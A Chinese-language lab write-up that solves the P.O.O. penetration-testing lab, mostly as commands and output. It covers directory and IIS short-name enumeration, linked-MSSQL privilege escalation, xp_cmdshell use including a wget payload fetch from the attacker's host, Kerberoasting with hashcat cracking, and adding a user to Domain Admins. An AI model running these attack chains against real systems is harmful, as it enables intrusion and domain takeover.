先用nmap
扫一下
└─$ sudo nmap -sS -sV -sC 10.13.38.11
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: IIS Windows Server
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.2027.00; RTM+
|_ssl-date: 2022-06-21T01:44:22+00:00; +4s from scanner time.
| ms-sql-ntlm-info:
| Target_Name: POO
| NetBIOS_Domain_Name: POO
| NetBIOS_Computer_Name: COMPATIBILITY
| DNS_Domain_Name: intranet.poo
| DNS_Computer_Name: COMPATIBILITY.intranet.poo
| DNS_Tree_Name: intranet.poo
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2022-06-19T02:28:12
|_Not valid after: 2052-06-19T02:28:12
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| ms-sql-info:
| 10.13.38.11:1433:
| Version:
| name: Microsoft SQL Server 2017 RTM+
| number: 14.00.2027.00
| Product: Microsoft SQL Server 2017
| Service pack level: RTM
| Post-SP patches applied: true
|_ TCP port: 1433
扫出了2个服务一个是80
端口的IIS
另一个是1433
端口的SQL Server
。可以知道这里有web服务和数据库服务,先访问一下发现主页面就是一个默认的IIS
界面。没有什么感兴趣的地方,那么接下来的渗透思路就是寻找其他的入口所以选择目录爆破。
└─$ gobuster dir -u http://10.13.38.11 -w /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt -t 50
===============================================================
/plugins (Status: 301) [Size: 150] [--> http://10.13.38.11/plugins/]
/themes (Status: 301) [Size: 149] [--> http://10.13.38.11/themes/]
/images (Status: 301) [Size: 149] [--> http://10.13.38.11/images/]
/js (Status: 301) [Size: 145] [--> http://10.13.38.11/js/]
/templates (Status: 301) [Size: 152] [--> http://10.13.38.11/templates/]
/admin (Status: 401) [Size: 1293]
/uploads (Status: 301) [Size: 150] [--> http://10.13.38.11/uploads/]
/dev (Status: 301) [Size: 146] [--> http://10.13.38.11/dev/]
/. (Status: 200) [Size: 703]
/widgets (Status: 301) [Size: 150] [--> http://10.13.38.11/widgets/]
/meta-inf (Status: 301) [Size: 151] [--> http://10.13.38.11/meta-inf/]
/.ds_store (Status: 200) [Size: 10244]
/.trashes (Status: 301) [Size: 151] [--> http://10.13.38.11/.trashes/]
首先admin
和uploads
一看就是非常感兴趣的地方,结果admin
需要身份验证而uploads
则爆出Access is denied
,看来这2个目录是行不通了。其他的都试了一遍都是Access is denied
,除了/.ds_store
目录可以下载,查了一下关于web站点下敏感文件.DS_Store 这个文件多用于Mac OS X系统中,虽然这是一台Windows主机,因为可能使用了Mac OS进行开发然后又将其部署在一个Windows机器上。
现在能明确的这是一份敏感文件,幸运的是这份文件还是很容易读取的,详细的二进制文件结构讲解Parsing the .DS_Store file format
一开始通过在线工具处理没太看懂,然后查到几个工具
└─ python main.py /home/kali/Downloads/ds_store
Count: 38
admin
admin
admin
dev
dev
dev
iisstart.htm
Images
Images
Images
JS
JS
JS
META-INF
META-INF
META-INF
New folder
New folder
New folder
New folder (2)
New folder (2)
New folder (2)
Plugins
Plugins
Plugins
Templates
Templates
Templates
Themes
Themes
Themes
Uploads
Uploads
Uploads
web.config
Widgets
Widgets
Widgets
其实也不太能看出啥。。。后来知道了这个
└─$ python /opt/DS_Walk/ds_walk.py -u http://10.13.38.11/
[!] .ds_store file is present on the webserver.
[+] Enumerating directories based on .ds_server file:
----------------------------
[!] http://10.13.38.11//admin
[!] http://10.13.38.11//dev
[!] http://10.13.38.11//iisstart.htm
[!] http://10.13.38.11//Images
[!] http://10.13.38.11//JS
[!] http://10.13.38.11//META-INF
[!] http://10.13.38.11//New folder
[!] http://10.13.38.11//New folder (2)
[!] http://10.13.38.11//Plugins
[!] http://10.13.38.11//Templates
[!] http://10.13.38.11//Themes
[!] http://10.13.38.11//Uploads
[!] http://10.13.38.11//web.config
[!] http://10.13.38.11//Widgets
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc
----------------------------
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/core
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/include
[!] http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/src
----------------------------
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/core
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/include
[!] http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/src
----------------------------
[!] http://10.13.38.11//Images/buttons
[!] http://10.13.38.11//Images/icons
[!] http://10.13.38.11//Images/iisstart.png
----------------------------
[!] http://10.13.38.11//JS/custom
----------------------------
[!] http://10.13.38.11//Themes/default
----------------------------
[!] http://10.13.38.11//Widgets/CalendarEvents
[!] http://10.13.38.11//Widgets/Framework
[!] http://10.13.38.11//Widgets/Menu
[!] http://10.13.38.11//Widgets/Notifications
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts
----------------------------
[!] http://10.13.38.11//Widgets/Framework/Layouts/custom
[!] http://10.13.38.11//Widgets/Framework/Layouts/default
----------------------------
[*] Finished traversing. No remaining .ds_store files present.
[*] Cleaning up .ds_store files saved to disk.
得到了远超gobuster的信息,然后拿这2串哈希去破解md5(mrb3n)=304c0c90fbc6520610abbf378e2339d1、md5(eks)=dca66d38fd916317687e1390a420c3fc
当然尝试进入这几个新目录同样是Access is denied
。拿去admin
目录也不是一对账密。猜测可能是SQL Server
的用户名?
只能看看有没有办法找到更多的入口了。了解到IIS
存在short name vulnerability,这应该是最广泛引用的资料了Microsoft IIS tilde character “~” Vulnerability/Feature – Short File/Folder Name Disclosure
而这篇中文博客则简单易懂IIS短文件名暴力猜解漏洞分析,这个漏洞是因为Windows为了兼容16位MS-DOS程序,Windows为文件名较长的文件(和文件夹)生成了对应的Windows 8.3 短文件名。
我们使用文中作者写的工具IIS_shortname_Scanner进行枚举。我们通过ds_walk
得到2个用户相同的目录core
、db
、include
、src
,然而只有db
可以扫。而且这2个db
目录下应该有着同样的一个txt文件。
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/dca66d38fd916317687e1390a420c3fc/db
Server is vulnerable, please wait, scanning...
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/p~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/po~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_c~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.t* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.tx* [scan in progress]
[+] //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [scan in progress]
[+] File //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt* [Done]
----------------------------------------------------------------
File: //dev/dca66d38fd916317687e1390a420c3fc/db/poo_co~1.txt*
----------------------------------------------------------------
└─$ python2 iis_shortname_Scan.py http://10.13.38.11//dev/304c0c90fbc6520610abbf378e2339d1/db
----------------------------------------------------------------
File: //dev/304c0c90fbc6520610abbf378e2339d1/db/poo_co~1.txt*
----------------------------------------------------------------
很明显poo是这个靶场的名字,那么关键在于后面的co从字典里将co开头的单词grep
出来,然后在最前面和后面分别加上poo_和txt即可。
#把coxxxx导入fuzz.txt
grep "^co" /usr/share/seclists/Discovery/Web-Content/raft-large-words-lowercase.txt > fuzz.txt
vim fuzz.txt
#在vim中执行命令
#在每行行首添加poo_
:%s/^/poo_
#在每行行尾添加.txt
:%s/$/.txt
#目录枚举
─$ gobuster dir -u http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db -w /home/kali/Desktop/fuzz.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
/poo_connection.txt (Status: 200) [Size: 142]
终于得到了,看看能不能进去吧。根据目录和文件名应该是数据库的配置文件?希望如此吧
└─$ curl http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/poo_connection.txt
SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#
Flag : POO{fcfb0****************5011ad555}
不仅得到了数据库的账密,本小关的flag也拿到了
草草草,用mssqlclient.py
去连,结果一直连不上,无奈看wp密码前后的2个#
居然要带上。
└─$ mssqlclient.py external_user:#p00Public3xt3rnalUs3r#@10.13.38.11
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
SQL>
可以先试一下1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks看看有什么提权的方法。
结果没错,看一下不是sysadmin权限直接不会了
SQL> SELECT is_srvrolemember('sysadmin');
-----------
0
然后通过wp了解到SQL Server
有一个数据库链接功能。创建链接的数据库之间可以互相执行SQL这是一个非常正常的功能,但是错误的配置就会导致我们拿到权限。先看看这台数据库上有什么用户。
SQL> SELECT name FROM master..syslogins
name
-------------------
sa
external_user
SQL> SELECT name FROM master..syslogins WHERE sysadmin = '1';
name
---------------------------------------
sa
这台数据库上有2个用户分别是管理员的sa
和普普通通的我external_user
。就算是普普通通也要看看有什么我们能用到的权限,结果简直普通极了。
SQL> SELECT entity_name, permission_name FROM fn_my_permissions(NULL, 'SERVER');
entity_name permission_name
------------- --------------------
server CONNECT SQL
SQL Server – Link… Link… Link… and Shell: How to Hack Database Links in SQL Server! 是我找到最早讲这个的,但是我觉得不是很好,一头雾水。但是他提到了2点。
Are you using Linked Servers? They may be in serious danger! 讲解了错误的配置将使链接用户成为sysadmin。MSSQL for Pentester: Abusing Linked Database则讲解了如何使用metasploit和PowerUpSQL利用此漏洞。
查看当前主机
SQL> select @@servername
--------------------------
COMPATIBILITY\POO_PUBLIC
看看有无链接主机
SQL> select srvname from sysservers;
srvname
------------------------------
COMPATIBILITY\POO_CONFIG
COMPATIBILITY\POO_PUBLIC
我们链接着另外一个主机COMPATIBILITY\POO_CONFIG
我们向其发出一些请求看看,按照文章里的是报错
SQL> select version from openquery("linkedserver", 'select @@version as version');
[-] ERROR(COMPATIBILITY\POO_PUBLIC): Line 1: Could not find server 'linkedserver' in sys.servers. Verify that the correct server name was specified. If necessary, execute the stored procedure sp_addlinkedserver to add the server to sys.servers.
幸好我们的wp作者已经解决了这个问题,发出一个请求看看当前服务器,返回结果COMPATIBILITY\POO_CONFIG
说明请求成功。
SQL> EXECUTE ('select @@servername;') at [COMPATIBILITY\POO_CONFIG];
------------------------------
COMPATIBILITY\POO_CONFIG
查看当前COMPATIBILITY\POO_CONFIG
的用户
SQL> EXECUTE ('select suser_name();') at [COMPATIBILITY\POO_CONFIG];
------------------------------
internal_user
同样看一下COMPATIBILITY\POO_CONFIG
数据库中拥有sysadmin权限的用户是谁
SQL> EXECUTE ('SELECT name FROM master..syslogins WHERE sysadmin = ''1'';') at [COMPATIBILITY\POO_CONFIG];
name
----------------
sa
还是sa,然后我们让COMPATIBILITY\POO_CONFIG
向COMPATIBILITY\POO_PUBLIC
发出一个请求
SQL> EXEC ('EXEC (''select suser_name();'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
------------------------------
sa
神奇的事情发生了,我们变成了sa用户。说明这2台数据库之间有错误的配置导致了我们的权限提升,再查看一下权限,发现我们拥有了所有权限
SQL> EXECUTE ('EXECUTE (''SELECT entity_name, permission_name FROM fn_my_permissions(NULL, ''''SERVER'''');'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
entity_name permission_name
------------------------------ ------------------------------
server CONNECT SQL
server SHUTDOWN
server CREATE ENDPOINT
server CREATE ANY DATABASE
server CREATE AVAILABILITY GROUP
server ALTER ANY LOGIN
server ALTER ANY CREDENTIAL
server ALTER ANY ENDPOINT
server ALTER ANY LINKED SERVER
server ALTER ANY CONNECTION
server ALTER ANY DATABASE
server ALTER RESOURCES
server ALTER SETTINGS
server ALTER TRACE
server ALTER ANY AVAILABILITY GROUP
server ADMINISTER BULK OPERATIONS
server AUTHENTICATE SERVER
server EXTERNAL ACCESS ASSEMBLY
server VIEW ANY DATABASE
server VIEW ANY DEFINITION
server VIEW SERVER STATE
server CREATE DDL EVENT NOTIFICATION
server CREATE TRACE EVENT NOTIFICATION
server ALTER ANY EVENT NOTIFICATION
server ALTER SERVER STATE
server UNSAFE ASSEMBLY
server ALTER ANY SERVER AUDIT
server CREATE SERVER ROLE
server ALTER ANY SERVER ROLE
server ALTER ANY EVENT SESSION
server CONNECT ANY DATABASE
server IMPERSONATE ANY LOGIN
server SELECT ALL USER SECURABLES
server CONTROL SERVER
然后我们创建一个拥有sysadmin权限的用户即可
SQL> EXECUTE('EXECUTE(''CREATE LOGIN df WITH PASSWORD = ''''qwe123QWE!@#'''';'') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
SQL> EXECUTE('EXECUTE(''EXEC sp_addsrvrolemember ''''df'''', ''''sysadmin'''''') AT [COMPATIBILITY\POO_PUBLIC]') AT [COMPATIBILITY\POO_CONFIG]
如果登录失败,那就稍稍等一下,要过一会才能生效。
─$ mssqlclient.py 'df:qwe123QWE!@#@10.13.38.11'
Impacket v0.10.1.dev1+20220606.123812.ac35841f - Copyright 2022 SecureAuth Corporation
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235)
[!] Press help for extra shell commands
#列出数据库
SQL> SELECT name FROM master..sysdatabases;
name
------------------------------
master
tempdb
model
msdb
POO_PUBLIC
flag
#查看数据库flag
SQL> select table_name,table_schema from flag.INFORMATION_SCHEMA.TABLES;
table_name table_schema
------------------------------ ------------------------------
flag dbo
#查询表flag
SQL> select * from flag.dbo.flag;
flag
----------------------------------------
b'POO{88d829eb************************}'
这回我们拿到是sysadmin,想着像STARTING POINT TIER 2 Archetype那样通过xp_cmdshell
来执行powershell
然后传nc64.exe。
#查看当前用户
SQL> xp_cmdshell "powershell -c whoami"
output
----------------------------------
nt service\mssql$poo_public
#进入当前目录并上传文件
SQL> xp_cmdshell "powershell -c cd C:\Users\MSSQL`$POO_PUBLIC\Downloads; wget http://10.10.17.21/nc64.exe -outfile nc64.exe"
output
-----------------------------------------------------
wget : Unable to connect to the remote server
#结果不出网,白搞了
SQL> xp_cmdshell "powershell -c ping 10.10.17.21"
output
---------------------------------------------------------- Pinging 10.10.17.21 with 32 bytes of data:
Ping statistics for 10.10.17.21:
Packets: Sent = 4, Received = 0, Lost = 4 (100% loss)
不过这里学到了powershell
的转义符,在powershell
中 $ 代表变量而用户名MSSQL$POO_PUBLIC
中的$POO_PUBLIC
会被当成变量,所以可以使用 ` 来转义 $ 。
以后上传文件之前得先测试一下连通性不然白搞。
只能先看看文件系统了
SQL> xp_cmdshell "powershell cd C://; ls"
output
------------------------------------------------------------------------
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 12/13/2019 3:58 AM inetpub
d----- 9/15/2018 10:19 AM PerfLogs
d-r--- 12/12/2019 7:35 PM Program Files
d----- 12/13/2019 4:01 AM Program Files (x86)
d-r--- 12/12/2019 6:02 PM Users
d----- 11/25/2021 9:36 PM Windows
-a---- 6/19/2022 12:35 PM 165593 PowerView.ps1
inetpub
是IIS
服务器目录,在里面发现了web.config
但是当前账号没有权限看
SQL> xp_cmdshell "powershell type C:\inetpub\wwwroot\web.config;"
------------------------------------------------------------------------
type : Access to the path 'C:\inetpub\wwwroot\web.config' is denied.
了解到SQL Server
可以使用外部脚本扩展,并且可配置为另一个用户运行这些脚本。
如何在SQL Server 2017
使用python脚本SQL Server 2017 - Python Executing Inside SQL Server
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("whoami");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
compatibility\poo_public01
结果我们变成了poo_public01
用户,而且该用户能查看web.config
文件
SQL> EXEC sp_execute_external_script @language =N'Python', @script = N'import os; os.system("type C:\inetpub\wwwroot\web.config");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
<system.webServer>
<staticContent>
<mimeMap
fileExtension=".DS_Store"
mimeType="application/octet-stream"
/>
</staticContent>
<!--
<authentication mode="Forms">
<forms name="login" loginUrl="/admin">
<credentials passwordFormat = "Clear">
<user
name="Administrator"
password="EverybodyWantsToWorkAtP.O.O."
/>
</credentials>
</forms>
</authentication>
-->
</system.webServer>
</configuration>
拿到了账号密码去http://10.13.38.11/admin/
输入即可。
上一部分已经拿到了IIS
服务器的账密,那么思路就是找到远程连接服务。因为现在是数据库管理员权限,直接列一下有哪些端口在服务就好,再看一下ip
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("netstat -ano");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 916
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:1433 0.0.0.0:0 LISTENING 4684
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:41433 0.0.0.0:0 LISTENING 4692
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING 492
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING 1168
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING 1672
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
UDP [::]:123 *:* 760
UDP [::]:500 *:* 2560
UDP [::]:1434 *:* 2792
UDP [::]:3702 *:* 2464
UDP [::]:3702 *:* 2464
UDP [::]:4500 *:* 2560
UDP [::]:5353 *:* 1080
UDP [::]:5355 *:* 1080
UDP [::]:59578 *:* 2464
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("ipconfig");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
Windows IP Configuration
Ethernet adapter Ethernet1:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 172.20.128.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::250
IPv6 Address. . . . . . . . . . . : dead:beef::1001
IPv6 Address. . . . . . . . . . . : dead:beef::6033:f520:ab97:3e4
Link-local IPv6 Address . . . . . : fe80::6033:f520:ab97:3e4%5
IPv4 Address. . . . . . . . . . . : 10.13.38.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : dead:beef::1
fe80::250:56ff:feb9:1f8d%5
10.13.38.2
经过wp的提示,还需要用ipv6扫一遍才能扫出远程连接服务,这让我想到之前遇到一个情况是远程连接服务不走TCP协议而是用UDP协议得用UDP才能扫出来。
奇怪的是ipconfig
出来了3个ipv6那就干脆都扫一遍吧,还用UDP也扫了一遍。
扫出的结果是各不相同,所以说要对扫描的结果保持怀疑,当觉得无路可走的时候可以质疑一下扫描结果,想一想还能用什么姿势扫。
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::250 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:15 EDT
Nmap scan report for dead:beef::250
Host is up (0.51s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp filtered wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
└─$ sudo nmap -sS -p 80,135,445,1433,5357,5985,41433,47001,49664,49665,49666 -6 dead:beef::1001 --min-rate 10000
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-22 04:17 EDT
Nmap scan report for dead:beef::1001
Host is up (0.38s latency).
PORT STATE SERVICE
80/tcp open http
135/tcp filtered msrpc
445/tcp filtered microsoft-ds
1433/tcp open ms-sql-s
5357/tcp filtered wsdapi
5985/tcp open wsman
41433/tcp filtered unknown
47001/tcp filtered winrm
49664/tcp filtered unknown
49665/tcp filtered unknown
49666/tcp filtered unknown
可以看到dead:beef::1001
的结果5985
是open的,而dead:beef::250
是filtered。
可以用evil-winrm来连,但是evil-winrm好像不能直接输ipv6地址,需要把dead:beef::1001 hostname
写入/etc/hosts
中
SQL> EXEC sp_execute_external_script @language = N'Python', @script = N'import os; os.system("hostname");';
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 0: STDOUT message(s) from external script:
COMPATIBILITY
#把dead:beef::1001 COMPATIBILITY写入/etc/hosts
└─$ evil-winrm -i compatibility -u administrator -p 'EverybodyWantsToWorkAtP.O.O.'
*Evil-WinRM* PS C:\Users\Administrator\Documents>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami
compatibility\administrator
#在\Administrator\Desktop发现flag.txt
现在我们已经拿到了一台主机的管理员权限了。而且在域intranet.poo
中。
*Evil-WinRM* PS C:\Users\Administrator\Desktop> systeminfo
Host Name: COMPATIBILITY
OS Name: Microsoft Windows Server 2019 Standard
Domain: intranet.poo
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4533013
[02]: KB4516115
[03]: KB4523204
[04]: KB4530715
那么首先就是搜索一下域内主机和用户之类的,结果发现都不行,因为本地用户是不能向域发送请求的。
不过,SQL Server
帐户可以代替。 Service accounts自动模拟Computer account,Computer account是域的成员,实际上是一种特殊类型的用户帐户。
在内网渗透 | SPN 与 Kerberoast 攻击讲解中了解到Kerberos协议和SPN,继续往下看有个GetUserSPNs.ps1脚本,用evil-winrm
上传,结果好像不稳定啊,重新回来复现的时候死活没法成功。因为这是本地用户,本地用户当然无法查询域信息了,所以要在之前拿到的SQL Shell
里运行。
*Evil-WinRM* PS C:\programdata> Import-Module .\GetUserSPNs.ps1
Exception calling "FindAllGlobalCatalogs" with "0" argument(s): "An operations error occurred.
"
At C:\programdata\GetUserSPNs.ps1:30 char:3
+ $CurrentGCs = $ForestInfo.FindAllGlobalCatalogs()
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : NotSpecified: (:) [], MethodInvocationException
+ FullyQualifiedErrorId : ActiveDirectoryOperationException
No Global Catalogs Found!
然后PowerView.ps1脚本可能因为过于久远被WD阻挡了Powershell Get-Random with dates blocked with "this script contains malicious content"看完后好像只能WD更新或者加入白名单才行。
不过好在Invoke-Kerberoast.ps1还能,这个脚本可以直接导出Hashcat格式的票据。但是在evil-winrm
中执行失败了,连接的SQL Server
的shell可以执行,可能是因为evil-winrm
权限不够?但是该用户已经是compatibility\administrator
管理员了吧,可能域权限不够?
SQL> xp_cmdshell "powershell -c import-module c:\programdata\invoke-kerberoast.ps1; invoke-kerberoast -outputformat hashcat"
output
--------------------------------------------------------------------
TicketByteHexStream : #略
SamAccountName : p00_hr
DistinguishedName : CN=p00_hr,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : HR_peoplesoft/intranet.poo:1433
TicketByteHexStream : #略
SamAccountName : p00_adm
DistinguishedName : CN=p00_adm,CN=Users,DC=intranet,DC=poo
ServicePrincipalName : cyber_audit/intranet.poo:443
得到了2个用户p00_hr和p00_adm的票据,直接从shell复制有大量空格,写一个脚本处理。因为Hashcat的票据里有$
,所以要用单引号括起来,双引号会对字符串进行shell解析。
#!/bin/bash
printf `echo $1 | sed 's/[[:space:]]//g'`;
└─$ ./strip_blank.sh 'p00_adm的票据'
$krb5tgs$23$*p00_adm$intranet.poo$cyber_audit/intranet.poo:443*$2D174A783C330A55AB2AF8E5733E074F$282865F55044416D0B8215DEBA1C8702368E0ED12620ABEFD419A1DE6DEB0465B85BB9D7F643577AE16BD9E8404F49B65A8E9F172AC44A875ED202714C9F63732E4D909833C8363492525FD9F35700804B2187291ED14B39CC82C3D1F8549AFD8D9FA4FA83AC1F2164F064C243E0A3FF0469ECCD2DC874B6C16DE5B530BD97571A669A7AA4BDA170E80859FDC66C0E922ADA65CBC66B78A4FA66F2E59E2EB8B5F806EE7CCB5ADA02391CE93F5C9DB7E91D41247E08D9C8977ADCC3841400852BC5E7C02AB1A6129710499007941B8541AA9108BAC770C04CB5EEF42BF39E5B46FFE716DA4A00AFADA2D47D24EF737D66CD1895C68E68299B75820491203D412D6B1F7BB6969F6D789F7764A183EDB4E97C731DE045154EDC76427A3CAA6C46FFB2203E64C2F0D45303B38C367E3906A612D5A66DCB14284B2D39CC7F2AB07E212AB60B1F18FB9880E4F43CA64E6FF8F2DA27617A1C262660140915B9CA7A6A344A3F0FB347006F40D88B29A006358A755748ADE2D606B872394C9826099F09FECDDF9B3969474632BC635AA039AF3CAD02D60C59A27765DAB66F0EA12A740F9F53F459B3AD866B24A7FBAF17E73500C6A9F5F6E57849BED1570AD8D4070573BD21DBC098D830ECEE9047BE0F6318CF930E4156C1BFD6813FF0CD1D77DE081C3012B579659CF698B23C50E50DC44D09135C54540EF1A33A158E428F4D56890025CA3A56E615AC1C16175974C2B96ECAE9B340463EE71836D0F0E0CF08178E3A386F9F7DB3398F811C0D7A8BB352E9E7FC1D4EB5275A9C3605DCB9285B95E1CF7C45A2BB757649B3FF80E836118B60541CE67CC72B0A74B50E9383B211B039A95DAD66D70E885B2D805BF68A3452306189433D37FCFD9E7804F8F7E3B98A2D8AC12A436BD7A1B4392D97EECCE519940DC9886446498D8459D279836310C0BEFBE85A2CC5146A2251D3A71EB198DAE7275A14F686ADAE3199FCB766C955A093F3620CE8F0F6CAA84307D827BFD805E6FC3939EEB2458AEF8685E9347DED0EF47926CED7F0402C75BD6CE84A88BDE1C4BFE245F80923F2F8AFF1ACA9AB30F205FBB04BF2F49D6D112220486E55D416D0943B3B23D4F049C7207B93ADED3CF83F4679B061CD6071C35DF5751272F1025A97908D86AB91F4F84CDA4BDD250F31EC72CB2A7C1EA7E0A1D7C5EDB37A5904B59EE30882D0C7AC60042439303733A1D266A9191F60DC880AF13865A5592EB309786AE264A5CCEE57F3963FC42C724AD9202871D07AD11E17D1E57297129D5DB09497ADA8C15A6A4F859C5B27AFB32574A779BF724F316F735112556CEF32BD46B8010E0E160DA5EA81281088EB0889406CC790DBA8442219FB332963D6E428E7990C7961283C5344ECCD81442EEC5DEB3B740CEA3FECA73A70B87044DF2104B6DDC55605DEBD4421FBE970539B526CDDFFBCBF0C65E36409700C46BA547707BCECF8FF4D5600485
└─$ hashcat -m 13100 hash.txt /usr/share/seclists/Passwords/Keyboard-Combinations.txt --force
#密码是ZQ!5t4r
那么接下来就把p00_adm加入到域管理员组里
*Evil-WinRM* PS C:\programdata> $pass = ConvertTo-SecureString 'ZQ!5t4r' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential('intranet.poo\p00_adm', $pass)
*Evil-WinRM* PS C:\programdata> Add-ADGroupMember -Identity 'Domain Admins' -Members 'p00_adm' -Credential $cred
└─$ evil-winrm -i compatibility -u p00_adm -p 'ZQ!5t4r'
*Evil-WinRM* PS C:\Users\p00_adm\Documents> net use \\DC.intranet.poo\c$ /u:intranet.poo\p00_adm 'ZQ!5t4r'
The command completed successfully.
*Evil-WinRM* PS C:\Users\p00_adm\Documents> dir \\DC.intranet.poo\c$\users\
Directory: \\DC.intranet.poo\c$\users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/15/2018 1:20 AM Administrator
d----- 3/15/2018 12:38 AM mr3ks
d----- 6/22/2022 5:21 PM p00_adm
d-r--- 11/21/2016 3:24 AM Public
*Evil-WinRM* PS C:\Users\p00_adm\Documents> type \\DC.intranet.poo\c$\users\mr3ks\desktop\flag.txt
POO{1196ef8bc523f084ad1732a38a0851d6}
到此P.O.O终于完成了,借助了很多wp的帮助,也认识和学习了很多之前不知道的东西。
